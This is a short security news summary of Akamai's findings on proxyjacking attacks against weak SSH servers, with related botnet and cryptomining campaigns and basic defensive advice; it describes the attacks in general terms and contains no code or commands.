The attackers were observed conducting a series of proxyjacking attacks aimed at hacking vulnerable SSH servers. They monetize them through proxyware services that provide compensation for the sharing of unused internet bandwidth.
The attackers are leveraging SSH for remote access and executing malicious scripts to covertly enlist victim servers into a Peer-to-Peer (P2P) proxy network, such as Peer2Proxy or Honeygain.
Diving into details
On June 8, Akamai initially detected the attacks when numerous SSH connections were established with honeypots managed by it.
- Upon successfully connecting to one of the vulnerable SSH servers, the attackers implemented a Bash script encoded in Base64. This script effectively incorporated the compromised systems into the proxy networks of Honeygain or Peer2Profit.
- Additionally, the script established a container environment by downloading Docker images of proxy networks, while simultaneously terminating competing containers that shared bandwidth.
- Further investigation revealed the presence of cryptocurrency miners, exploits, and hacking tools on the compromised server, indicating that the threat actors may have fully transitioned to proxyjacking or employed it as an additional means of generating passive income.
Why it matters
- Proxyjacking has emerged as a fresh avenue for cybercriminals to generate profits from compromised devices, spanning both corporate and consumer ecosystems.
- This method offers a more covert alternative to cryptojacking and introduces significant implications that compound the challenges already posed by proxied Layer 7 attacks.
Notable attacks against SSH servers
- Recently, Microsoft unveiled an ongoing cryptomining campaign that involves hijacking SSH credentials for vulnerable Linux and Windows systems.
- Last month, ASEC researchers uncovered a campaign disseminating the Tsunami botnet on poorly managed SSH servers. Apart from Tsunami, the attackers distributed ShellBot, XMRig miner, and Log Cleaner to carry out DDoS and cryptomining attacks.
The bottom line
Even with the advent of new outcomes, traditional methods continue to demonstrate their effectiveness. Monetized proxyjacking serves as a prime illustration of this concept, and it is highly likely that we will witness the emergence of novel strategies specifically focused on this type of attack. Implementing standard security measures such as robust passwords, diligent patch management, and comprehensive logging is among the effective preventive measures.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/shutterstock_659365798.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/ce38_Blog_CharmingKitten3_3.jpg)
